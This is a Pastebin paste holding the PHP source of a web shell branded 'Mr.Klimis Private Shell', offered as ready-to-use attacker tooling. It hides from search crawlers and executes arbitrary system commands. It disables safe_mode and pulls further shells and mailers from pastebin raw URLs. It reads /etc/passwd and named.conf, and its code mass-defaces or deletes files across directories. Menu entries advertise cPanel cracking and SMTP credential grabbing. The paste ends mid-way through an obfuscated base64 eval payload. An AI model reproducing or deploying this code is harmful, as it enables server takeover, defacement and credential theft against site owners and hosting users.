VanGans

klimis shell

Feb 7th, 2019
284
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 117.39 KB | None | 0 0
  1. <?php
  2. session_start();
  3. error_reporting(0);
  4. set_time_limit(0);
  5. @set_magic_quotes_runtime(0);
  6. @clearstatcache();
  7. @ini_set('error_log',NULL);
  8. @ini_set('log_errors',0);
  9. @ini_set('max_execution_time',0);
  10. @ini_set('output_buffering',0);
  11. @ini_set('display_errors', 0);
  12.  
  13. $auth_pass = "e75583b31f53318ba26a1e413c16ef6e"; //
  14. $color = "#00ff00";
  15. $default_action = 'FilesMan';
  16. $default_use_ajax = true;
  17. $default_charset = 'UTF-8';
  18. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  19. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  20. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  21. header('HTTP/1.0 404 Not Found');
  22. exit;
  23. }
  24. }
  25.  
  26. function login_shell() {
  27. ?>
  28. <html>
  29. <head>
  30. <title>.:Mr.Klimis Private Shell:.</title>
  31. <style type="text/css">
  32. html {
  33. margin: 20px auto;
  34. background: #000000;
  35. color: #4B0082;
  36. text-align: center;
  37. }
  38. header {
  39. color: #4B0082;
  40. margin: 10px auto;
  41. }
  42. input[type=password] {
  43. width: 250px;
  44. height: 25px;
  45. color: red;
  46. background: #000000;
  47. border: 1px dotted #4B0082;
  48. padding: 5px;
  49. margin-left: 20px;
  50. text-align: center;
  51. }
  52. </style>
  53. </head>
  54. <center>
  55. <header>
  56. <style type="text/css">img{opacity:0.5;-webkit-transition:all 250ms ease;-moz-transition:all 250ms ease;-o-transition:all 250ms ease;transition:all 250ms ease;}img:hover{opacity:1;}textarea{resize:none;}</style>
  57. <center><img src="https://cdna.artstation.com/p/assets/images/images/003/136/090/large/gh-chew-final-03a.jpg?1470148207" class="shakeimage" onmouseout="init(this);rattleimage()" onmouseover="stoprattle(this);top.focus()" onclick="top.focus()" height="350px"><br>
  58. <form method="post">
  59. <input type="password" name="pass">
  60. </form>
  61. <?php
  62. exit;
  63. }
  64. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  65. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  66. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  67. else
  68. login_shell();
  69. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  70. @ob_clean();
  71. $file = $_GET['file'];
  72. header('Content-Description: File Transfer');
  73. header('Content-Type: application/octet-stream');
  74. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  75. header('Expires: 0');
  76. header('Cache-Control: must-revalidate');
  77. header('Pragma: public');
  78. header('Content-Length: ' . filesize($file));
  79. readfile($file);
  80. exit;
  81. }
  82. ?>
  83. <html>
  84. <head>
  85. <center>
  86. <title>Mr.Klimis</title>
  87. <meta name='author' content='D4RKNE55'>
  88. <meta charset="UTF-8">
  89. <center><style type='text/css'>
  90. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  91. html {
  92. background: #000000;
  93. color: #ffffff;
  94. font-family: 'abel';
  95. font-size: 13px;
  96. width: 100%;
  97. }
  98. li {
  99. display: inline;
  100. margin: 5px;
  101. padding: 5px;
  102. }
  103. table, th, td {
  104. border-collapse:collapse;
  105. font-family: Tahoma, Geneva, sans-serif;
  106. background: transparent;
  107. font-family: 'abel';
  108. font-size: 13px;
  109. }
  110. .table_home, .th_home, .td_home {
  111. border: 1px solid #ffffff;
  112. }
  113. th {
  114. padding: 10px;
  115. }
  116. a {
  117. color: #ffffff;
  118. text-decoration: none;
  119. }
  120. a:hover {
  121. color: #4B0082;
  122. text-decoration: underline;
  123. }
  124. b {
  125. color: #4B0082;
  126. }
  127. input[type=text], input[type=password],input[type=submit] {
  128. background: transparent;
  129. color: #ffffff;
  130. border: 1px solid #ffffff;
  131. margin: 5px auto;
  132. padding-left: 5px;
  133. font-family: 'abel';
  134. font-size: 13px;
  135. }
  136. textarea {
  137. border: 1px solid #ffffff;
  138. width: 100%;
  139. height: 400px;
  140. padding-left: 5px;
  141. margin: 10px auto;
  142. resize: none;
  143. background: transparent;
  144. color: #ffffff;
  145. font-family: 'abel';
  146. font-size: 13px;
  147. }
  148. select {
  149. width: 152px;
  150. background: #000000;
  151. color: #4B0082;
  152. border: 1px solid #ffffff;
  153. margin: 5px auto;
  154. padding-left: 5px;
  155. font-family: 'abel';
  156. font-size: 13px;
  157. }
  158. option:hover {
  159. background: #4B0082;
  160. color: #000000;
  161. }
  162. </style>
  163. </head>
  164. <center>
  165. <?php
  166. if (file_exists("php.ini")){
  167. }else{
  168. $img = fopen('php.ini', 'w');
  169. $sec = "safe_mode = OFF
  170. disable_funtions = NONE";
  171. fwrite($img ,$sec);
  172. fclose($img);}
  173. function w($dir,$perm) {
  174. if(!is_writable($dir)) {
  175. return "<font color=red>".$perm."</font>";
  176. } else {
  177. return "<font color=#4B0082>".$perm."</font>";
  178. }
  179. }
  180. function exe($cmd) {
  181. if(function_exists('system')) {
  182. @ob_start();
  183. @system($cmd);
  184. $buff = @ob_get_contents();
  185. @ob_end_clean();
  186. return $buff;
  187. } elseif(function_exists('exec')) {
  188. @exec($cmd,$results);
  189. $buff = "";
  190. foreach($results as $result) {
  191. $buff .= $result;
  192. } return $buff;
  193. } elseif(function_exists('passthru')) {
  194. @ob_start();
  195. @passthru($cmd);
  196. $buff = @ob_get_contents();
  197. @ob_end_clean();
  198. return $buff;
  199. } elseif(function_exists('shell_exec')) {
  200. $buff = @shell_exec($cmd);
  201. return $buff;
  202. }
  203. }
  204. function perms($file){
  205. $perms = fileperms($file);
  206. if (($perms & 0xC000) == 0xC000) {
  207. $info = 's';
  208. } elseif (($perms & 0xA000) == 0xA000) {
  209. $info = 'l';
  210. } elseif (($perms & 0x8000) == 0x8000) {
  211. $info = '-';
  212. } elseif (($perms & 0x6000) == 0x6000) {
  213. $info = 'b';
  214. } elseif (($perms & 0x4000) == 0x4000) {
  215. $info = 'd';
  216. } elseif (($perms & 0x2000) == 0x2000) {
  217. $info = 'c';
  218. } elseif (($perms & 0x1000) == 0x1000) {
  219. $info = 'p';
  220. } else {
  221. $info = 'u';
  222. }
  223. $info .= (($perms & 0x0100) ? 'r' : '-');
  224. $info .= (($perms & 0x0080) ? 'w' : '-');
  225. $info .= (($perms & 0x0040) ?
  226. (($perms & 0x0800) ? 's' : 'x' ) :
  227. (($perms & 0x0800) ? 'S' : '-'));
  228. $info .= (($perms & 0x0020) ? 'r' : '-');
  229. $info .= (($perms & 0x0010) ? 'w' : '-');
  230. $info .= (($perms & 0x0008) ?
  231. (($perms & 0x0400) ? 's' : 'x' ) :
  232. (($perms & 0x0400) ? 'S' : '-'));
  233. $info .= (($perms & 0x0004) ? 'r' : '-');
  234. $info .= (($perms & 0x0002) ? 'w' : '-');
  235. $info .= (($perms & 0x0001) ?
  236. (($perms & 0x0200) ? 't' : 'x' ) :
  237. (($perms & 0x0200) ? 'T' : '-'));
  238. return $info;
  239. }
  240. function hdd($s) {
  241. if($s >= 1073741824)
  242. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  243. elseif($s >= 1048576)
  244. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  245. elseif($s >= 1024)
  246. return sprintf('%1.2f',$s / 1024 ) .' KB';
  247. else
  248. return $s .' B';
  249. }
  250. function ambilKata($param, $kata1, $kata2){
  251. if(strpos($param, $kata1) === FALSE) return FALSE;
  252. if(strpos($param, $kata2) === FALSE) return FALSE;
  253. $start = strpos($param, $kata1) + strlen($kata1);
  254. $end = strpos($param, $kata2, $start);
  255. $return = substr($param, $start, $end - $start);
  256. return $return;
  257. }
  258. if(get_magic_quotes_gpc()) {
  259. function idx_ss($array) {
  260. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  261. }
  262. $_POST = idx_ss($_POST);
  263. }
  264. function CreateTools($names,$lokasi){
  265. if ( $_GET['create'] == $names ){
  266. $a= "".$_SERVER['SERVER_NAME']."";
  267. $b= dirname($_SERVER['PHP_SELF']);
  268. $c = "/cox_tools/".$names.".php";
  269. if (file_exists('cox_tools/'.$names.'.php')){
  270. echo '<script type="text/javascript">alert("Done");window.location.href = "cox_tools/'.$names.'.php";</script> ';
  271. }
  272. else {mkdir("cox_tools", 0777);
  273. file_put_contents('cox_tools/'.$names.'.php', file_get_contents($lokasi));
  274. echo ' <script type="text/javascript">alert("Done");window.location.href = "cox_tools/'.$names.'.php";</script> ';}}}
  275.  
  276. CreateTools("wso","http://pastebin.com/raw/3eh3Gej2");
  277. CreateTools("adminer"."https://www.adminer.org/static/download/4.2.5/adminer-4.2.5.php");
  278. CreateTools("b374k","http://pastebin.com/raw/rZiyaRGV");
  279. CreateTools("injection","http://pastebin.com/raw/nxxL8c1f");
  280. CreateTools("promailerv2","http://pastebin.com/raw/Rk9v6eSq");
  281. CreateTools("gamestopceker","http://pastebin.com/raw/QSnw1JXV");
  282. CreateTools("bukapalapak","http://pastebin.com/raw/6CB8krDi");
  283. CreateTools("tokopedia","http://pastebin.com/dvhzWgby");
  284. CreateTools("encodedecode","http://pastebin.com/raw/wqB3G5eZ");
  285. CreateTools("mailer","http://pastebin.com/raw/9yu1DmJj");
  286. CreateTools("r57","http://pastebin.com/raw/G2VEDunW");
  287. CreateTools("tokenpp","http://pastebin.com/raw/72xgmtPL");
  288. CreateTools("extractor","http://pastebin.com/raw/jQnMFHBL");
  289. CreateTools("bh","http://pastebin.com/raw/3L2ESWeu");
  290. CreateTools("dhanus","http://pastebin.com/raw/v4xGus6X");
  291. if(isset($_GET['dir'])) {
  292. $dir = $_GET['dir'];
  293. chdir($_GET['dir']);
  294. } else {
  295. $dir = getcwd();
  296. }
  297. $dir = str_replace("\\","/",$dir);
  298. $scdir = explode("/", $dir);
  299. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=#4B0082>OFF</font>";
  300. $ling="http://".$_SERVER['SERVER_NAME']."".$_SERVER['PHP_SELF']."?create";
  301. $ds = @ini_get("disable_functions");
  302. $mysql = (function_exists('mysql_connect')) ? "<font color=#4B0082>ON</font>" : "<font color=red>OFF</font>";
  303. $curl = (function_exists('curl_version')) ? "<font color=#4B0082>ON</font>" : "<font color=red>OFF</font>";
  304. $wget = (exe('wget --help')) ? "<font color=#4B0082>ON</font>" : "<font color=red>OFF</font>";
  305. $perl = (exe('perl --help')) ? "<font color=#4B0082>ON</font>" : "<font color=red>OFF</font>";
  306. $python = (exe('python --help')) ? "<font color=#4B0082>ON</font>" : "<font color=red>OFF</font>";
  307. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=#4B0082>NONE</font>";
  308. if(!function_exists('posix_getegid')) {
  309. $user = @get_current_user();
  310. $uid = @getmyuid();
  311. $gid = @getmygid();
  312. $group = "?";
  313. } else {
  314. $uid = @posix_getpwuid(posix_geteuid());
  315. $gid = @posix_getgrgid(posix_getegid());
  316. $user = $uid['name'];
  317. $uid = $uid['uid'];
  318. $group = $gid['name'];
  319. $gid = $gid['gid'];
  320. }
  321. $d0mains = @file("/etc/named.conf");
  322. $users=@file('/etc/passwd');
  323. if($d0mains)
  324. {
  325. $count;
  326. foreach($d0mains as $d0main)
  327. {
  328. if(@ereg("zone",$d0main))
  329. {
  330. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  331. flush();
  332. if(strlen(trim($domains[1][0])) > 2)
  333. {
  334. flush();
  335. $count++;
  336. }
  337. }
  338. }
  339. }
  340.  
  341. $sport=$_SERVER['SERVER_PORT'];
  342. echo "<table style='width:100%'>";
  343. echo "<tr><td>System: <font color=#4B0082>".php_uname()."</font></td></tr>";
  344. echo "<tr><td>User: <font color=#4B0082>".$user."</font> (".$uid.") Group: <font color=#4B0082>".$group."</font> (".$gid.")</td></tr>";
  345. echo "<tr><td>Server IP: <font color=#4B0082>".gethostbyname($_SERVER['HTTP_HOST'])."</font> | Your IP: <font color=#4B0082>".$_SERVER['REMOTE_ADDR']."</font></td></tr>";
  346. echo "<tr><td>HDD: <font color=#4B0082>".hdd(disk_free_space("/"))."</font> / <font color=#4B0082>".hdd(disk_total_space("/"))."</font></td></tr>";
  347. echo "<tr><td>Websites :<font color=#4B0082> $count </font> Domains</td></tr>";
  348. echo "<tr><td>Port :<font color=#4B0082> $sport</font> </td></tr>";
  349. echo "<tr><td>Safe Mode: $sm</td></tr>";
  350. echo "<tr><td>Disable Functions: $show_ds</td></tr>";
  351. echo "<tr><td>MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl </td></tr>";
  352. echo "<tr><td>Current DIR: ";
  353. foreach($scdir as $c_dir => $cdir) {
  354. echo "<a href='?dir=";
  355. for($i = 0; $i <= $c_dir; $i++) {
  356. echo $scdir[$i];
  357. if($i != $c_dir) {
  358. echo "/";
  359. }
  360. }
  361. echo "'>$cdir</a>/";
  362. }
  363. echo "</td></tr></table><hr>";
  364. echo "<center>";
  365. echo "<ul>";
  366. echo "<li>[ <a href='?'>Home</a> ]</li>";
  367. echo "<li>[ <a href='?dir=$dir&do=upload'>Upload</a> ]</li>";
  368. echo "<li>[ <a href='?dir=$dir&do=cmd'>Command</a> ]</li>";
  369. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> ]</li>";
  370. echo "<li>[ <a href='?dir=$dir&do=config'>Config</a> ]</li>";
  371. echo "<li>[ <a href='?dir=$dir&do=lcf'>LiteSpeed Config</a> ]</li>";
  372. echo "<li>[ <a href='?dir=$dir&do=jumping'>Jumping</a> ]</li>";
  373. echo "<li>[ <a href='?dir=$dir&do=symlink'>Symlink</a> ]<br></li>";
  374. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>";
  375. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> ]</li>";
  376. echo "<li>[ <a href='?dir=$dir&do=zoneh'>Zone-H</a> ]</li>";
  377. echo "<li>[ <a href='?dir=$dir&do=defacerid'>Defacer.ID</a> ]</li>";
  378. echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li><br>";
  379. echo "<li>[ <a href='?dir=$dir&do=adminer'>Adminer</a> ]</li>";
  380. echo "<li>[ <a href='?dir=$dir&do=fake_root'>Fake Root</a> ]</li>";
  381. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> ]</li>";
  382. echo "<li>[ <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> ]</li>";
  383. echo "<li>[ <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> ]</li>";
  384. echo "<li>[ <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a> ]</li>";
  385. echo "<li>[ <a href='?dir=$dir&do=passwbypass'>Bypass etc/passw</a> ]<br></li>";
  386. echo "<li>[ <a href='?dir=$dir&do=loghunter'>Log Hunter</a> ]</li>";
  387. echo "<li>[ <a href='?dir=$dir&do=shellchk'>Shell Checker</a> ]</li>";
  388. echo "<li>[ <a href='?dir=$dir&do=shelscan'>Shell Finder</a> ]</li>";
  389. echo "<li>[ <a href='?dir=$dir&do=zip'>Zip Menu</a> ]</li>";
  390. echo "<li>[ <a href='?dir=$dir&do=about'>About</a> ]</li>";
  391. echo "<li>[ <a href='?dir=$dir&do=metu'>LogOut</a> ]<br></li>";
  392. echo "</ul>";
  393. echo "</center>";
  394. echo "<hr>";
  395. if($_GET['do'] == 'upload') {
  396. echo "<center>";
  397. if($_POST['upload']) {
  398. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  399. $act = "<font color=#4B0082>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  400. } else {
  401. $act = "<font color=red>failed to upload file</font>";
  402. }
  403. }
  404. echo "Upload File: [ ".w($dir,"Writeable")." ]<form method='post' enctype='multipart/form-data'><input type='file' name='ix_file'><input type='submit' value='upload' name='upload'></form>";
  405. echo $act;
  406. echo "</center>";
  407. }
  408. elseif($_GET['do'] == 'cmd') {
  409. echo "<form method='post'>
  410. <font style='text-decoration: underline;'>".$user."@".gethostbyname($_SERVER['HTTP_HOST']).":~# </font>
  411. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  412. </form>";
  413. if($_POST['do_cmd']) {
  414. echo "<pre>".exe($_POST['cmd'])."</pre>";
  415. }
  416. } elseif($_GET['do'] == 'mass_deface') {
  417. echo "<center><form action=\"\" method=\"post\">\n";
  418. $dirr=$_POST['d_dir'];
  419. $index = $_POST["script"];
  420. $index = str_replace('"',"'",$index);
  421. $index = stripslashes($index);
  422. function edit_file($file,$index){
  423. if (is_writable($file)) {
  424. clear_fill($file,$index);
  425. echo "<Span style='color:#4B0082;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
  426. }
  427. else {
  428. echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
  429. }
  430. }
  431. function hapus_massal($dir,$namafile) {
  432. if(is_writable($dir)) {
  433. $dira = scandir($dir);
  434. foreach($dira as $dirb) {
  435. $dirc = "$dir/$dirb";
  436. $lokasi = $dirc.'/'.$namafile;
  437. if($dirb === '.') {
  438. if(file_exists("$dir/$namafile")) {
  439. unlink("$dir/$namafile");
  440. }
  441. } elseif($dirb === '..') {
  442. if(file_exists("".dirname($dir)."/$namafile")) {
  443. unlink("".dirname($dir)."/$namafile");
  444. }
  445. } else {
  446. if(is_dir($dirc)) {
  447. if(is_writable($dirc)) {
  448. if(file_exists($lokasi)) {
  449. echo "[<font color=#4B0082>DELETED</font>] $lokasi<br>";
  450. unlink($lokasi);
  451. $idx = hapus_massal($dirc,$namafile);
  452. }
  453. }
  454. }
  455. }
  456. }
  457. }
  458. }
  459. function clear_fill($file,$index){
  460. if(file_exists($file)){
  461. $handle = fopen($file,'w');
  462. fwrite($handle,'');
  463. fwrite($handle,$index);
  464. fclose($handle); } }
  465.  
  466. function gass(){
  467. global $dirr , $index ;
  468. chdir($dirr);
  469. $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  470. $files = scandir($dirr) ;
  471. $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
  472. sort($files);
  473. $n = 0 ;
  474. foreach ($files as $file){
  475. if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
  476. echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
  477. edit_file($file,$index);
  478. flush();
  479. $n = $n +1 ;
  480. }
  481. }
  482. echo "<br>";
  483. echo "<center><br><h3>$n Kali Anda Telah Ngecrot Disini </h3></center><br>";
  484. }
  485. function ListFiles($dirrall) {
  486.  
  487. if($dh = opendir($dirrall)) {
  488.  
  489. $files = Array();
  490. $inner_files = Array();
  491. $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  492. $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
  493. while($file = readdir($dh)) {
  494. if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
  495. if(is_dir($dirrall . "/" . $file)) {
  496. $inner_files = ListFiles($dirrall . "/" . $file);
  497. if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  498. } else {
  499. array_push($files, $dirrall . "/" . $file);
  500. }
  501. }
  502. }
  503.  
  504. closedir($dh);
  505. return $files;
  506. }
  507. }
  508. function gass_all(){
  509. global $index ;
  510. $dirrall=$_POST['d_dir'];
  511. foreach (ListFiles($dirrall) as $key=>$file){
  512. $file = str_replace('//',"/",$file);
  513. echo "<center><strong>$file</strong> ===>";
  514. edit_file($file,$index);
  515. flush();
  516. }
  517. $key = $key+1;
  518. echo "<center><br><h3>$key Kali Anda Telah Ngecrot Disini </h3></center><br>"; }
  519. function sabun_massal($dir,$namafile,$isi_script) {
  520. if(is_writable($dir)) {
  521. $dira = scandir($dir);
  522. foreach($dira as $dirb) {
  523. $dirc = "$dir/$dirb";
  524. $lokasi = $dirc.'/'.$namafile;
  525. if($dirb === '.') {
  526. file_put_contents($lokasi, $isi_script);
  527. } elseif($dirb === '..') {
  528. file_put_contents($lokasi, $isi_script);
  529. } else {
  530. if(is_dir($dirc)) {
  531. if(is_writable($dirc)) {
  532. echo "[<font color=#4B0082>DONE</font>] $lokasi<br>";
  533. file_put_contents($lokasi, $isi_script);
  534. $idx = sabun_massal($dirc,$namafile,$isi_script);
  535. }
  536. }
  537. }
  538. }
  539. }
  540. }
  541. if($_POST['mass'] == 'onedir') {
  542. echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
  543. $ini="http://";
  544. $mainpath=$_POST[d_dir];
  545. $file=$_POST[d_file];
  546. $dir=opendir("$mainpath");
  547. $code=base64_encode($_POST[script]);
  548. $indx=base64_decode($code);
  549. while($row=readdir($dir)){
  550. $start=@fopen("$row/$file","w+");
  551. $finish=@fwrite($start,$indx);
  552. if ($finish){
  553. echo"$ini$row/$file\n";
  554. }
  555. }
  556. echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
  557. $mainpath=$_POST[d_dir];$file=$_POST[d_file];
  558. $dir=opendir("$mainpath");
  559. $code=base64_encode($_POST[script]);
  560. $indx=base64_decode($code);
  561. while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
  562. $finish=@fwrite($start,$indx);
  563. if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
  564. }
  565.  
  566. }
  567. elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
  568. elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
  569. elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
  570. elseif($_POST['mass'] == 'massdeface') {
  571. echo "<div style='margin: 5px auto; padding: 5px'>";
  572. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  573. echo "</div>"; }
  574. else {
  575. echo "
  576. <center><font style='text-decoration: underline;'>
  577. Select Type:<br>
  578. </font>
  579. <select class=\"select\" name=\"mass\" style=\"width: 450px;\" height=\"10\">
  580. <option value=\"onedir\">Mass Deface 1 Dir</option>
  581. <option value=\"massdeface\">Mass Deface ALL Dir</option>
  582. <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
  583. <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
  584. <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
  585. <font style='text-decoration: underline;'>Folder:</font><br>
  586. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  587. <font style='text-decoration: underline;'>Filename:</font><br>
  588. <input type='text' name='d_file' value='Klimis.php' style='width: 450px;' height='10'><br>
  589. <font style='text-decoration: underline;'>Index File:</font><br>
  590. <textarea name='script' style='width: 450px; height: 200px;'>Hacked By Mr.Klimis</textarea><br>
  591. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  592. </form></center>";
  593. }
  594. }
  595. elseif($_GET['do'] == 'zip') {
  596. echo "<center><h1>Zip Menu</h1>";
  597. function rmdir_recursive($dir) {
  598. foreach(scandir($dir) as $file) {
  599. if ('.' === $file || '..' === $file) continue;
  600. if (is_dir("$dir/$file")) rmdir_recursive("$dir/$file");
  601. else unlink("$dir/$file");
  602. }
  603. rmdir($dir);
  604. }
  605. if($_FILES["zip_file"]["name"]) {
  606. $filename = $_FILES["zip_file"]["name"];
  607. $source = $_FILES["zip_file"]["tmp_name"];
  608. $type = $_FILES["zip_file"]["type"];
  609. $name = explode(".", $filename);
  610. $accepted_types = array('application/zip', 'application/x-zip-compressed', 'multipart/x-zip', 'application/x-compressed');
  611. foreach($accepted_types as $mime_type) {
  612. if($mime_type == $type) {
  613. $okay = true;
  614. break;
  615. }
  616. }
  617. $continue = strtolower($name[1]) == 'zip' ? true : false;
  618. if(!$continue) {
  619. $message = "Itu Bukan Zip , , GOBLOK COK";
  620. }
  621. $path = dirname(__FILE__).'/';
  622. $filenoext = basename ($filename, '.zip');
  623. $filenoext = basename ($filenoext, '.ZIP');
  624. $targetdir = $path . $filenoext;
  625. $targetzip = $path . $filename;
  626. if (is_dir($targetdir)) rmdir_recursive ( $targetdir);
  627. mkdir($targetdir, 0777);
  628. if(move_uploaded_file($source, $targetzip)) {
  629. $zip = new ZipArchive();
  630. $x = $zip->open($targetzip);
  631. if ($x === true) {
  632. $zip->extractTo($targetdir);
  633. $zip->close();
  634.  
  635. unlink($targetzip);
  636. }
  637. $message = "<b>Sukses Gan :)</b>";
  638. } else {
  639. $message = "<b>Error Gan :(</b>";
  640. }
  641. }
  642. echo '<table style="width:100%" border="1">
  643. <tr><td><h2>Upload And Unzip</h2><form enctype="multipart/form-data" method="post" action="">
  644. <label>Zip File : <input type="file" name="zip_file" /></label>
  645. <input type="submit" name="submit" value="Upload And Unzip" />
  646. </form>';
  647. if($message) echo "<p>$message</p>";
  648. echo "</td><td><h2>Zip Backup</h2><form action='' method='post'><font style='text-decoration: underline;'>Folder:</font><br><input type='text' name='dir' value='$dir' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/cox_backup.zip' style='width: 450px;' height='10'><br><input type='submit' name='backup' value='BackUp!' style='width: 215px;'></form>";
  649. if($_POST['backup']){
  650. $save=$_POST['save'];
  651. function Zip($source, $destination)
  652. {
  653. if (extension_loaded('zip') === true)
  654. {
  655. if (file_exists($source) === true)
  656. {
  657. $zip = new ZipArchive();
  658.  
  659. if ($zip->open($destination, ZIPARCHIVE::CREATE) === true)
  660. {
  661. $source = realpath($source);
  662.  
  663. if (is_dir($source) === true)
  664. {
  665. $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
  666.  
  667. foreach ($files as $file)
  668. {
  669. $file = realpath($file);
  670.  
  671. if (is_dir($file) === true)
  672. {
  673. $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
  674. }
  675.  
  676. else if (is_file($file) === true)
  677. {
  678. $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
  679. }
  680. }
  681. }
  682.  
  683. else if (is_file($source) === true)
  684. {
  685. $zip->addFromString(basename($source), file_get_contents($source));
  686. }
  687. }
  688.  
  689. return $zip->close();
  690. }
  691. }
  692.  
  693. return false;
  694. }
  695. Zip($_POST['dir'],$save);
  696. echo "Done , Save To <b>$save</b>";
  697. }
  698. echo "</td><td><h2>Unzip Manual</h2><form action='' method='post'><font style='text-decoration: underline;'>Zip Location:</font><br><input type='text' name='dir' value='$dir/file.zip' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/cox_unzip' style='width: 450px;' height='10'><br><input type='submit' name='extrak' value='Unzip!' style='width: 215px;'></form>";
  699. if($_POST['extrak']){
  700. $save=$_POST['save'];
  701. $zip = new ZipArchive;
  702. $res = $zip->open($_POST['dir']);
  703. if ($res === TRUE) {
  704. $zip->extractTo($save);
  705. $zip->close();
  706. echo 'Succes , Location : <b>'.$save.'</b>';
  707. } else {
  708. echo 'Gagal Mas :( Ntahlah !';
  709. }
  710. }
  711. echo '</tr></table>';
  712. }
  713. elseif($_GET['do'] == 'shellchk') {
  714. eval(str_rot13(gzinflate(str_rot13(base64_decode(('vUddQtswFH1epf4HcCE1VUxbNvEwdSMGd9FeJtGhPaygyLZ5B6jc5AaHORP/fdf5IoXxsBeiSbGdZu491z6+cTiA1GVPdCkwDTIaDnM5lyVupoT5Nc1ymWWmWpZdRm9FXWOGqzguTlue4Utjpa+p53a411OCIcKZFCxqGVUES63F8XGSylAx3jr+oATX45SXE3LBubGwAsM16RLpY5Jlp+aHh1RR8jscWaPZpI0dzbay/hdZJJqkziiFUZV5t5ohSmIE1POy0M+Bl+381rjEL1whj5xmh/kwvC85oifDTp6wqlXyADr2ynAJKJgpiEaeTrCvLaDIA/J0OCD47FswS6Yi85pEzzrYVoNF2ujEg0OX0jJ1duvpWlW+hORmhxQIElNvPuS/inBksxEA98JsNaPjRIiU9civj2FpYL5jhElwWdN8KmUSZ3fm5NNn2pVFMWILSHUuPTFerhbfSYs1Xax+nV2s4u+Xl4slegNI6MckWBxvdmiUx6SRWHUftOXZ5jWmD/Gi9qAUbdMVvKPKP6elKVxA1QayIrWnG3A59y6ibiMjrDMd9OI+9UfcyU9QsvB3W5VwT4eDHam5xc85F8ACd40q3EvfeMxADe3HzatgAcLD58AhwYNoyOxJDvqc5pYhhrOHCO8Y097nXM6vJACLfvCEct6IWaMfGxj5VXOGSwk5Opai4J5n72gj0Wfza+sM+x29+D6bR5eFWaK2xCcCQcELBxy9Y8DbOjFY2nF26JjF88lC3zmYZHEJ8hYkTFaJFtp7j3dpzPvfdKxZKYx9j1CWkFJfuSbvZMzDAf78MRdXgQ724/Oz5cVtR7dA7BK95oW9TvX6id8rrLYhYIaupzSE